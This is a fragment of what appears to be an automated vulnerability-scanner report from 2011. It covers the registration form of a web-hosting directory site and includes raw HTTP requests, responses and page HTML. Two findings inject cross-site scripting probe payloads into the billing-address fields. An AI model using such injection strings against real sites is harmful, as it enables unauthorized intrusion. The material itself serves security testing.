value='C4C0A65D598D2DD5DC1752C72CDB8E54C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5C3AB18F2760A14B1C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD5CED1C1BFE4CFA0EAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD509AA34A6696A3947C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD538D25091421132B5C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD5B7E25E2774DA0F8BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD5842FA774765936C66F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD5AA6319E9999A52E86F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD579623661ABEB22BD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
'"--></style></script><script>alert(0x001C8A)</script>
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C8A)%3c%2fscript%3e&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD5F6D770E1F9FB6591C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD59EDD47ECDA823DE66F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD5C1493FA2646892AEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5796B90B701858C0EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD5CE18F775AD197E516F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5B368910B3BB5C037C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD5CC456E0A20EE2B36C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD5779FE3A0EC91324E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD51F1831E80EE0BBEBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD5E31553200C997EA76F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD51D34B53E86B389ADC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5005B0D6578706B28C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD57DF58E038A111B0EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5262BA3131E137831C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5D7C0B04C6C9CC985C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD56591F90C76FD52A4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD5004D0BACDED0F9956F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD5C011E29862EF71F06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD57B12A758A009ABAE6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
'"--></style></script><script>alert(0x001C8B)</script>
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C8B)%3c%2fscript%3e&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD561633E961CA535E2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD58007CB78A1508C6C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD5B32ABC846D0721DEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option 